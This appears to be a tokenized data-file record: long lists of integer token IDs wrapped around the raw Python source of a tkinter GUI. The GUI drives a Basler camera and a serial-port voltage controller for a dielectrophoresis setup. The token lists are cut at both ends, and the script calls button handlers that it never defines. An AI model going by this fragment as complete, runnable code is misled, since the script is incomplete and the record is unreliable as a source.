850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 11, 40715, 8, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 220, 331, 18242, 10786, 35645, 357, 13500, 8, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 872, 1084, 62, 9806, 41888, 28300, 7, 1084, 7, 40715, 20679, 2231, 27493, 2231, 2906, 346, 7, 9806, 7, 40715, 20679, 2231, 27493, 2231, 11208, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 220, 872, 1084, 62, 9806, 7, 16, 8, 872, 1084, 62, 9806, 7, 17, 8, 12962, 198, 220, 220, 220, 220, 1303, 10706, 1084, 62, 9806, 28, 744, 7, 746, 1084, 62, 9806, 14, 3829, 27493, 3829, 26, 198, 220, 220, 220, 220, 1303, 900, 7, 70, 6888, 4032, 56, 51, 624, 3256, 25928, 1084, 62, 9806, 7, 16, 2599, 3829, 25, 25928, 1084, 62, 9806, 7, 17, 4008, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 1065, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 11, 5305, 7, 55, 2232, 4008, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 331, 18242, 10786, 15633, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 949, 5305, 3509, 5305, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 1485, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 11, 48466, 7, 55, 2232, 4008, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 331, 18242, 10786, 3546, 363, 3219, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 10356, 363, 12991, 363, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 1415, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 2153, 28, 1238, 9, 6404, 940, 7, 8937, 7, 55, 2232, 18125, 198, 220, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 9, 17, 9, 14415, 11, 19726, 8, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 15546, 14, 82, 8, 11537, 198, 220, 220, 220, 220, 1303, 220, 331, 18242, 10786, 13436, 357, 36077, 8, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 54, 1084, 370, 9806, 949, 19726, 3509, 19726, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 1314, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 9, 17, 9, 14415, 11, 40715, 8, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 15546, 14, 82, 8, 11537, 198, 220, 220, 220, 220, 1303, 220, 331, 18242, 10786, 35645, 357, 13500, 8, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 54, 1084, 370, 9806, 220, 872, 1084, 62, 9806, 7, 16, 8, 872, 1084, 62, 9806, 7, 17, 8, 12962, 198, 220, 220, 220, 220, 1303, 10706, 1084, 62, 9806, 28, 744, 7, 746, 1084, 62, 9806, 14, 3829, 27493, 3829, 26, 198, 220, 220, 220, 220, 1303, 900, 7, 70, 6888, 4032, 56, 51, 624, 3256, 25928, 1084, 62, 9806, 7, 16, 2599, 3829, 25, 25928, 1084, 62, 9806, 7, 17, 4008, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 17, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 2153, 28, 1238, 9, 6404, 940, 7, 8937, 7, 55, 2232, 18125, 198, 220, 220, 220, 220, 1303, 7110, 7, 37, 11, 19726, 8, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 220, 331, 18242, 10786, 13436, 357, 36077, 8, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 949, 19726, 3509, 19726, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 17, 11, 16, 11, 17, 8, 198, 220, 220, 220, 220, 1303, 7110, 7, 37, 11, 40715, 8, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 220, 331, 18242, 10786, 35645, 357, 13500, 8, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 872, 1084, 62, 9806, 41888, 28300, 7, 1084, 7, 40715, 20679, 2231, 27493, 2231, 2906, 346, 7, 9806, 7, 40715, 20679, 2231, 27493, 2231, 11208, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 872, 1084, 62, 9806, 7, 16, 8, 872, 1084, 62, 9806, 7, 17, 8, 12962, 198, 220, 220, 220, 220, 1303, 10706, 1084, 62, 9806, 28, 744, 7, 746, 1084, 62, 9806, 14, 3829, 27493, 3829, 26, 198, 220, 220, 220, 220, 1303, 900, 7, 70, 6888, 4032, 56, 51, 624, 3256, 25928, 1084, 62, 9806, 7, 16, 2599, 3829, 25, 25928, 1084, 62, 9806, 7, 17, 4008, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 37227, 628, 198, 4299, 2124, 10215, 81, 7, 83, 11, 2124, 11, 331, 11, 1976, 263, 404, 324, 28, 17821, 2599, 198, 220, 220, 220, 37227, 14385, 11, 645, 34165, 393, 5254, 1865, 526, 15931, 198, 220, 220, 220, 256, 559, 796, 256, 198, 220, 220, 220, 1303, 264, 87, 796, 18896, 7, 87, 8, 198, 220, 220, 220, 1303, 827, 796, 18896, 7, 88, 8, 198, 220, 220, 220, 611, 1976, 263, 404, 324, 318, 6407, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1395, 77, 796, 45941, 13, 487, 83, 13, 81, 487, 83, 7, 87, 11, 299, 28, 11925, 7, 87, 8, 1635, 362, 8, 198, 220, 220, 220, 220, 220, 220, 220, 575, 77, 796, 45941, 13, 1102, 73, 7, 2777, 13, 487, 83, 7, 88, 11, 299, 28, 11925, 7, 87, 8, 1635, 362, 4008, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1395, 77, 796, 45941, 13, 487, 83, 13, 81, 487, 83, 7, 87, 8, 198, 220, 220, 220, 220, 220, 220, 220, 575, 77, 796, 45941, 13, 1102, 73, 7, 37659, 13, 487, 83, 13, 81, 487, 83, 7, 88, 4008, 628, 220, 220, 220, 2124, 10215, 796, 45941, 13, 5305, 7, 487, 83, 8002, 13, 487, 912, 29323, 7, 2777, 13, 361, 701, 7, 55, 77, 1635, 575, 77, 22305, 198, 220, 220, 220, 288, 83, 796, 256, 58, 16, 60, 532, 256, 58, 15, 60, 628, 220, 220, 220, 256, 559, 796, 45941, 13, 21602, 10223, 32590, 11925, 7, 87, 10215, 8, 1220, 362, 1635, 288, 83, 532, 288, 83, 1220, 362, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 18896, 7, 87, 10215, 8, 1220, 362, 1635, 288, 83, 532, 288, 83, 1220, 362, 11, 18896, 7, 87, 10215, 4008, 198, 220, 220, 220, 1441, 256, 559, 11, 2124, 10215, 628, 198, 4299, 15554, 62, 11011, 9615, 7, 2435, 11, 848, 62, 2435, 28, 14202, 11, 848, 62, 32257, 28, 14202, 11, 4274, 17945, 28, 25101, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 34590, 62, 67, 12514, 28, 14202, 2599, 198, 220, 220, 220, 37227, 8645, 378, 28590, 15554, 2277, 357, 13959, 264, 500, 737, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 640, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 352, 2124, 399, 640, 7177, 13, 35042, 1262, 4600, 37659, 13, 21602, 10223, 7, 15, 11, 940, 11, 12825, 737, 3447, 1758, 7, 16, 12095, 16, 8, 63, 198, 220, 220, 220, 220, 220, 220, 220, 329, 1672, 198, 220, 220, 220, 848, 62, 2435, 1058, 12178, 357, 25968, 8, 198, 220, 220, 220, 220, 220, 220, 220, 3862, 286, 21228, 286, 25278, 13, 15161, 318, 657, 13, 16, 640, 886, 640, 12, 543, 198, 220, 220, 220, 220, 220, 220, 220, 16083, 2499, 880, 329, 2928, 4856, 198, 220, 220, 220, 848, 62, 32257, 1058, 12178, 357, 25968, 8, 198, 220, 220, 220, 220, 220, 220, 220, 22920, 286, 25278, 13, 15161, 318, 657, 13, 486, 286, 2472, 1700, 198, 220, 220, 220, 4274, 17945, 1058, 41146, 357, 25968, 8, 198, 220, 220, 220, 220, 220, 220, 220, 40402, 9585, 286, 2277, 284, 33836, 257, 2089, 5587, 13, 15161, 318, 10352, 198, 220, 220, 220, 34590, 62, 67, 12514, 1058, 12178, 357, 25968, 8, 198, 220, 220, 220, 220, 220, 220, 220, 3862, 3580, 1022, 4165, 5587, 290, 23221, 1218, 5587, 198, 220, 220, 220, 220, 220, 220, 220, 15161, 318, 657, 13, 2999, 286, 1700, 13, 628, 220, 220, 220, 16409, 198, 220, 220, 220, 35656, 198, 220, 220, 220, 2700, 1058, 12178, 7177, 628, 220, 220, 220, 21066, 198, 220, 220, 220, 24200, 198, 220, 220, 220, 13163, 1330, 30999, 33407, 355, 410, 83, 198, 220, 220, 220, 13163, 640, 796, 45941, 13, 21602, 10223, 7, 15, 11, 940, 11, 35500, 737, 3447, 1758, 7, 16, 12095, 16, 8, 198, 220, 220, 220, 13163, 2700, 796, 410, 83, 13, 17980, 62, 11011, 9615, 7, 2435, 11, 4274, 17945, 28, 17821, 8, 198, 220, 220, 220, 13163, 458, 83, 13, 29487, 7, 2435, 13, 51, 11, 2700, 13, 51, 8, 198, 220, 220, 220, 685, 27, 6759, 29487, 8019, 13, 6615, 13, 13949, 17, 35, 2134, 986, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 640, 62, 9806, 796, 45941, 13, 9806, 7, 2435, 8, 198, 220, 220, 220, 611, 848, 62, 2435, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 848, 62, 2435, 796, 657, 13, 16, 1635, 640, 62, 9806, 628, 220, 220, 220, 611, 848, 62, 32257, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 848, 62, 32257, 796, 657, 13, 486, 1635, 640, 62, 9806, 628, 220, 220, 220, 611, 34590, 62, 67, 12514, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 34590, 62, 67, 12514, 796, 657, 13, 2999, 628, 220, 220, 220, 34590, 62, 67, 12514, 796, 34590, 62, 67, 12514, 1635, 640, 62, 9806, 628, 220, 220, 220, 640, 796, 640, 13, 3447, 1758, 7, 16, 11, 532, 16, 8, 628, 220, 220, 220, 848, 62, 684, 316, 62, 9630, 796, 493, 7, 2435, 13, 43358, 58, 16, 60, 1635, 848, 62, 2435, 1220, 640, 62, 9806, 8, 198, 220, 220, 220, 848, 62, 28968, 62, 9630, 796, 493, 19510, 2435, 13, 43358, 58, 16, 12962, 1635, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 11011, 62, 2435, 1343, 848, 62, 32257, 8, 1220, 640, 62, 9806, 8, 198, 220, 220, 220, 848, 62, 13664, 796, 848, 62, 28968, 62, 9630, 532, 848, 62, 684, 316, 62, 9630, 628, 220, 220, 220, 309, 796, 848, 62, 32257, 1635, 362, 198, 220, 220, 220, 37615, 796, 362, 1635, 45941, 13, 14415, 1220, 309, 628, 220, 220, 220, 25278, 796, 45941, 13, 31369, 7, 462, 4908, 1635, 640, 58, 15, 11, 1058, 11011, 62, 13664, 12962, 628, 220, 220, 220, 2700, 796, 45941, 13, 9107, 418, 62, 2339, 7, 2435, 8, 198, 220, 220, 220, 2700, 58, 15, 11, 848, 62, 684, 316, 62, 9630, 25, 11011, 62, 684, 316, 62, 9630, 1343, 848, 62, 13664, 60, 796, 25278, 628, 220, 220, 220, 611, 4274, 17945, 318, 6407, 25, 198, 220, 220, 220, 220, 220, 220, 220, 3385, 62, 684, 316, 62, 9630, 796, 493, 7, 2435, 13, 43358, 58, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1635, 357, 11011, 62, 2435, 1343, 34590, 62, 67, 12514, 8, 1220, 640, 62, 9806, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2700, 58, 15, 11, 3385, 62, 684, 316, 62, 9630, 25, 67, 12944, 62, 684, 316, 62, 9630, 1343, 848, 62, 13664, 60, 796, 25278, 628, 220, 220, 220, 2700, 796, 2700, 1220, 599, 72, 13, 14323, 862, 7, 3174, 13, 3447, 1758, 32590, 16, 828, 44332, 28, 2435, 58, 15, 11, 352, 12962, 198, 220, 220, 220, 1441, 2700, 628, 198, 4299, 875, 1920, 7, 83, 11, 287, 62, 12683, 282, 11, 6291, 62, 35324, 2599, 198, 220, 220, 220, 374, 37811, 10707, 1920, 257, 6737, 284, 26332, 19232, 3098, 12, 7344, 839, 6737, 13, 628, 220, 220, 220, 16409, 262, 6737, 866, 12, 37687, 10137, 284, 4600, 39873, 62, 35324, 63, 351, 281, 198, 220, 220, 220, 3098, 12, 7344, 2313, 8106, 5625, 379, 4153, 4, 286, 4600, 6291, 62, 35324, 44646, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 256, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 640, 7177, 11, 2546, 357, 45, 35751, 198, 220, 220, 220, 6737, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 6737, 7177, 11, 2546, 357, 45, 11, 828, 357, 76, 11, 45, 828, 393, 357, 76, 11, 45, 11, 77, 8, 198, 220, 220, 220, 6291, 62, 35324, 1058, 12178, 198, 220, 220, 220, 220, 220, 220, 220, 649, 19232, 8373, 628, 220, 220, 220, 16409, 198, 220, 220, 220, 35656, 198, 220, 220, 220, 640, 1058, 12178, 7177, 198, 220, 220, 220, 875, 15655, 62, 12683, 282, 1058, 12178, 7177, 628, 220, 220, 220, 21066, 198, 220, 220, 220, 24200, 198, 220, 220, 220, 13163, 640, 796, 45941, 13, 21602, 10223, 7, 15, 11, 19, 11, 1821, 4846, 8, 198, 220, 220, 220, 13163, 334, 796, 45941, 13, 25120, 13, 25192, 77, 7, 16, 11, 11925, 7, 2435, 4008, 198, 220, 220, 220, 13163, 256, 2435, 11, 6737, 62, 448, 796, 875, 1920, 7, 2435, 11, 334, 11, 1802, 8, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 288, 83, 796, 256, 58, 16, 60, 532, 256, 58, 15, 60, 198, 220, 220, 220, 1459, 62, 35324, 796, 352, 1220, 288, 83, 198, 220, 220, 220, 2030, 80, 62, 31944, 796, 6291, 62, 35324, 1220, 1459, 62, 35324, 198, 220, 220, 220, 370, 77, 796, 764, 24, 1635, 2030, 80, 62, 31944, 198, 220, 220, 220, 275, 11, 257, 796, 6737, 13, 4360, 353, 7, 23, 11, 370, 77, 11, 705, 9319, 11537, 198, 220, 220, 220, 611, 18896, 7, 259, 62, 12683, 282, 13, 43358, 8, 1875, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 29083, 62, 12683, 282, 796, 6737, 13, 1652, 346, 353, 7, 65, 11, 257, 11, 287, 62, 12683, 282, 11, 16488, 28, 16, 8, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 29083, 62, 12683, 282, 796, 6737, 13, 1652, 346, 353, 7, 65, 11, 257, 11, 287, 62, 12683, 282, 8, 198, 220, 220, 220, 2239, 796, 493, 7, 16, 1220, 2030, 80, 62, 31944, 8, 198, 220, 220, 220, 640, 796, 256, 58, 3712, 9662, 60, 198, 220, 220, 220, 611, 18896, 7, 259, 62, 12683, 282, 13, 43358, 8, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 29083, 62, 12683, 282, 796, 29083, 62, 12683, 282, 58, 3712, 9662, 60, 198, 220, 220, 220, 1288, 361, 18896, 7, 259, 62, 12683, 282, 13, 43358, 8, 6624, 362, 25, 198, 220, 220, 220, 220, 220, 220, 220, 29083, 62, 12683, 282, 796, 29083, 62, 12683, 282, 58, 45299, 7904, 9662, 60, 198, 220, 220, 220, 1288, 361, 18896, 7, 259, 62, 12683, 282, 13, 43358, 8, 6624, 513, 25, 198, 220, 220, 220, 220, 220, 220, 220, 29083, 62, 12683, 282, 796, 29083, 62, 12683, 282, 58, 45299, 7904, 9662, 11, 1058, 60, 198, 220, 220, 220, 1441, 640, 11, 29083, 62, 12683, 282, 198 ]
2.058975
20,246
import serial import time import tkinter import tkinter.font as font from datetime import datetime from PIL import ImageTk, Image import sys import pypylon.pylon as py import matplotlib.pyplot as plt import numpy as np import cv2 # SOME PART OF CAMERA CODE CREATES AN INSTANCE OF TK THAT USES PACK. SO WE CANNOT USE GRID AND WE HAVE TO # ASSIGN EACH COMPONENT TO THE MASTER=FRAME # Note that the camera code will throw exception if camera is not connected. # Locate & Initialize camera cam = py.InstantCamera(py.TlFactory.GetInstance().CreateFirstDevice()) cam.Open() # Reset to factory Defaults cam.UserSetSelector = "Default" cam.UserSetLoad.Execute() # Set to blk/white photo cam.PixelFormat = "RGB8" # Take one picture - need dif approach for looping imgs res = cam.GrabOne(1000) # Get array form of picture img = res.Array # Display our image plt.imshow(img) # Below is the code for handling images in the background # We need this so that our GUI still responds while pictures are being taken automatically # We need to decide how many pictures we want to take with each burst, and whether the user tells us when to take or whether they are collected automatically # We should also display the images as they are taken (or at least one from each burst) so that the user has some sense of what's actually happening # If we want to do all camera management through our GUI, we should have a way for the user to see what's happening without saving the pictures to save space # We also need to decide WHEN we want to calculate deformation. If we calculate it automatically then we could do so as soon as the images are taken. # If we rely on the user to outline the image, we need to make sure that we hold onto the voltage value associated with the image until that time. converter = py.ImageFormatConverter() converter.OutputPixelFormat = py.PixelType_BGR8packed converter.OutputBitAlignment = py.OutputBitAlignment_MsbAligned imgs = [] ser = serial.Serial('com3', 9600) ser.write(bytes([0])) frame = tkinter.Tk() frame.geometry('1000x800') frame.title("Cytomech DEP Controller") lgFont = "Times 20 bold" PIL_image = np.ones((900,600))*150 tk_image = ImageTk.PhotoImage(master=frame,image=Image.fromarray(PIL_image)) imgLbl = tkinter.Label(frame,image=tk_image,width=900,height=600) imgLbl.pack() decVoltageBtn = tkinter.Button(frame, text="-", font=lgFont, command=decVoltage, height = 2, fg = "black", bg = 'yellow', width = 4, bd = 5, activebackground='white' ) #decVoltageBtn.grid(row=1,column=1,rowspan=2, padx=20, pady=5) decVoltageBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left") voltageTxt = tkinter.StringVar(master=frame) voltIndex = tkinter.IntVar(master=frame) voltIndex.set(0) voltageTxt.set("Current Vpp (est): 0") voltLbl = tkinter.Label(frame,textvariable=voltageTxt, width = 15,font=lgFont) #voltLbl.grid(row=3,column=1,columnspan=3, padx=20, pady=5) voltLbl.pack(pady = 10,expand=True,fill='both',side="left") incVoltageBtn = tkinter.Button(frame, text="+", font=lgFont, command=incVoltage, height = 2, fg = "black", bg = 'green', width = 4, bd = 5, activebackground='white' ) #incVoltageBtn.grid(row=1,column=3,rowspan=2) incVoltageBtn.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left") photoBtn = tkinter.Button(frame, text="Take Photo", font=lgFont, command=takePhoto, height = 2, fg = "black", bg = '#FF7715', width = 10, bd = 5, activebackground='white' ) #photoBtn.grid(row=4,column=1,rowspan=2, padx=20, pady=5) photoBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left") quitButton = tkinter.Button( frame, text="QUIT", font=lgFont, command=quit, height = 2, fg = "black", width = 5, bg = 'red', bd = 5 ) #quitButton.grid(row=4,column=3,rowspan=2, padx=20, pady=5) quitButton.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left") tkinter.mainloop()
[ 11748, 11389, 201, 198, 11748, 640, 201, 198, 11748, 256, 74, 3849, 201, 198, 11748, 256, 74, 3849, 13, 10331, 355, 10369, 201, 198, 6738, 4818, 8079, 1330, 4818, 8079, 201, 198, 6738, 350, 4146, 1330, 7412, 51, 74, 11, 7412, 201, 198, 11748, 25064, 201, 198, 201, 198, 11748, 279, 4464, 15158, 13, 79, 15158, 355, 12972, 201, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 201, 198, 11748, 299, 32152, 355, 45941, 201, 198, 11748, 269, 85, 17, 201, 198, 201, 198, 2, 41670, 16652, 3963, 32421, 46461, 42714, 29244, 29462, 3537, 40589, 19240, 3963, 309, 42, 14603, 1294, 1546, 47035, 13, 12809, 12887, 15628, 11929, 23210, 10863, 2389, 5357, 12887, 21515, 5390, 201, 198, 2, 24994, 16284, 412, 16219, 24301, 1340, 3525, 5390, 3336, 32337, 5781, 28, 10913, 10067, 201, 198, 201, 198, 2, 5740, 326, 262, 4676, 2438, 481, 3714, 6631, 611, 4676, 318, 407, 5884, 13, 201, 198, 201, 198, 2, 406, 13369, 1222, 20768, 1096, 4676, 201, 198, 20991, 796, 12972, 13, 49933, 35632, 7, 9078, 13, 51, 75, 22810, 13, 3855, 33384, 22446, 16447, 5962, 24728, 28955, 201, 198, 20991, 13, 11505, 3419, 201, 198, 201, 198, 2, 30027, 284, 8860, 2896, 13185, 201, 198, 20991, 13, 12982, 7248, 17563, 273, 796, 366, 19463, 1, 201, 198, 20991, 13, 12982, 7248, 8912, 13, 23002, 1133, 3419, 201, 198, 201, 198, 2, 5345, 284, 698, 74, 14, 11186, 4590, 201, 198, 20991, 13, 40809, 26227, 796, 366, 36982, 23, 1, 220, 201, 198, 201, 198, 2, 7214, 530, 4286, 532, 761, 288, 361, 3164, 329, 9052, 278, 545, 14542, 201, 198, 411, 796, 12172, 13, 48400, 3198, 7, 12825, 8, 201, 198, 201, 198, 2, 3497, 7177, 1296, 286, 4286, 201, 198, 9600, 796, 581, 13, 19182, 201, 198, 201, 198, 2, 16531, 674, 2939, 201, 198, 489, 83, 13, 320, 12860, 7, 9600, 8, 201, 198, 201, 198, 2, 10383, 318, 262, 2438, 329, 9041, 4263, 287, 262, 4469, 201, 198, 2, 775, 761, 428, 523, 326, 674, 25757, 991, 20067, 981, 5986, 389, 852, 2077, 6338, 201, 198, 2, 775, 761, 284, 5409, 703, 867, 5986, 356, 765, 284, 1011, 351, 1123, 11173, 11, 290, 1771, 262, 2836, 4952, 514, 618, 284, 1011, 393, 1771, 484, 389, 7723, 6338, 201, 198, 2, 775, 815, 635, 3359, 262, 4263, 355, 484, 389, 2077, 357, 273, 379, 1551, 530, 422, 1123, 11173, 8, 523, 326, 262, 2836, 468, 617, 2565, 286, 644, 338, 1682, 5836, 201, 198, 2, 1002, 356, 765, 284, 466, 477, 4676, 4542, 832, 674, 25757, 11, 356, 815, 423, 257, 835, 329, 262, 2836, 284, 766, 644, 338, 5836, 1231, 8914, 262, 5986, 284, 3613, 2272, 201, 198, 201, 198, 2, 775, 635, 761, 284, 5409, 42099, 356, 765, 284, 15284, 390, 1161, 13, 1002, 356, 15284, 340, 6338, 788, 356, 714, 466, 523, 355, 2582, 355, 262, 4263, 389, 2077, 13, 201, 198, 2, 1002, 356, 8814, 319, 262, 2836, 284, 19001, 262, 2939, 11, 356, 761, 284, 787, 1654, 326, 356, 1745, 4291, 262, 15004, 1988, 3917, 351, 262, 2939, 1566, 326, 640, 13, 201, 198, 201, 198, 1102, 332, 353, 796, 12972, 13, 5159, 26227, 3103, 332, 353, 3419, 201, 198, 1102, 332, 353, 13, 26410, 40809, 26227, 796, 12972, 13, 40809, 6030, 62, 33, 10761, 23, 34860, 201, 198, 1102, 332, 353, 13, 26410, 13128, 2348, 16747, 796, 12972, 13, 26410, 13128, 2348, 16747, 62, 10128, 65, 2348, 3916, 201, 198, 9600, 82, 796, 17635, 201, 198, 220, 220, 220, 220, 201, 198, 201, 198, 2655, 796, 11389, 13, 32634, 10786, 785, 18, 3256, 860, 8054, 8, 201, 198, 2655, 13, 13564, 7, 33661, 26933, 15, 60, 4008, 201, 198, 201, 198, 14535, 796, 256, 74, 3849, 13, 51, 74, 3419, 201, 198, 14535, 13, 469, 15748, 10786, 12825, 87, 7410, 11537, 201, 198, 14535, 13, 7839, 7203, 20418, 83, 462, 354, 5550, 47, 22741, 4943, 201, 198, 201, 198, 75, 70, 23252, 796, 366, 28595, 1160, 10758, 1, 201, 198, 201, 198, 47, 4146, 62, 9060, 796, 45941, 13, 1952, 19510, 12865, 11, 8054, 4008, 9, 8628, 201, 198, 30488, 62, 9060, 796, 220, 7412, 51, 74, 13, 6191, 5159, 7, 9866, 28, 14535, 11, 9060, 28, 5159, 13, 6738, 18747, 7, 47, 4146, 62, 9060, 4008, 201, 198, 9600, 43, 2436, 796, 256, 74, 3849, 13, 33986, 7, 14535, 11, 9060, 28, 30488, 62, 9060, 11, 10394, 28, 12865, 11, 17015, 28, 8054, 8, 201, 198, 9600, 43, 2436, 13, 8002, 3419, 201, 198, 201, 198, 12501, 53, 5978, 496, 33, 34106, 796, 256, 74, 3849, 13, 21864, 7, 14535, 11, 201, 198, 220, 220, 220, 2420, 2625, 12, 1600, 201, 198, 220, 220, 220, 10369, 28, 75, 70, 23252, 11, 201, 198, 220, 220, 220, 3141, 28, 12501, 53, 5978, 496, 11, 201, 198, 220, 220, 220, 6001, 796, 362, 11, 201, 198, 220, 220, 220, 277, 70, 796, 366, 13424, 1600, 201, 198, 220, 220, 220, 275, 70, 796, 705, 36022, 3256, 201, 198, 220, 220, 220, 9647, 796, 604, 11, 201, 198, 220, 220, 220, 275, 67, 796, 642, 11, 201, 198, 220, 220, 220, 4075, 25249, 11639, 11186, 6, 201, 198, 8, 201, 198, 2, 12501, 53, 5978, 496, 33, 34106, 13, 25928, 7, 808, 28, 16, 11, 28665, 28, 16, 11, 808, 12626, 28, 17, 11, 14841, 87, 28, 1238, 11, 279, 4597, 28, 20, 8, 201, 198, 12501, 53, 5978, 496, 33, 34106, 13, 8002, 7, 15636, 87, 796, 838, 11, 279, 4597, 796, 838, 11, 20966, 324, 87, 28, 940, 11, 541, 4597, 28, 940, 11, 11201, 392, 28, 17821, 11, 20797, 11639, 16885, 3256, 1589, 2625, 9464, 4943, 201, 198, 201, 198, 201, 198, 37764, 496, 51, 742, 796, 256, 74, 3849, 13, 10100, 19852, 7, 9866, 28, 14535, 8, 201, 198, 37764, 15732, 796, 256, 74, 3849, 13, 5317, 19852, 7, 9866, 28, 14535, 8, 201, 198, 37764, 15732, 13, 2617, 7, 15, 8, 201, 198, 37764, 496, 51, 742, 13, 2617, 7203, 11297, 569, 381, 357, 395, 2599, 657, 4943, 201, 198, 37764, 43, 2436, 796, 256, 74, 3849, 13, 33986, 7, 14535, 11, 5239, 45286, 28, 37764, 496, 51, 742, 11, 9647, 796, 1315, 11, 10331, 28, 75, 70, 23252, 8, 201, 198, 2, 37764, 43, 2436, 13, 25928, 7, 808, 28, 18, 11, 28665, 28, 16, 11, 28665, 12626, 28, 18, 11, 14841, 87, 28, 1238, 11, 279, 4597, 28, 20, 8, 201, 198, 37764, 43, 2436, 13, 8002, 7, 79, 4597, 796, 838, 11, 11201, 392, 28, 17821, 11, 20797, 11639, 16885, 3256, 1589, 2625, 9464, 4943, 201, 198, 201, 198, 1939, 53, 5978, 496, 33, 34106, 796, 256, 74, 3849, 13, 21864, 7, 14535, 11, 201, 198, 220, 220, 220, 2420, 2625, 10, 1600, 201, 198, 220, 220, 220, 10369, 28, 75, 70, 23252, 11, 201, 198, 220, 220, 220, 3141, 28, 1939, 53, 5978, 496, 11, 201, 198, 220, 220, 220, 6001, 796, 362, 11, 201, 198, 220, 220, 220, 277, 70, 796, 366, 13424, 1600, 201, 198, 220, 220, 220, 275, 70, 796, 705, 14809, 3256, 201, 198, 220, 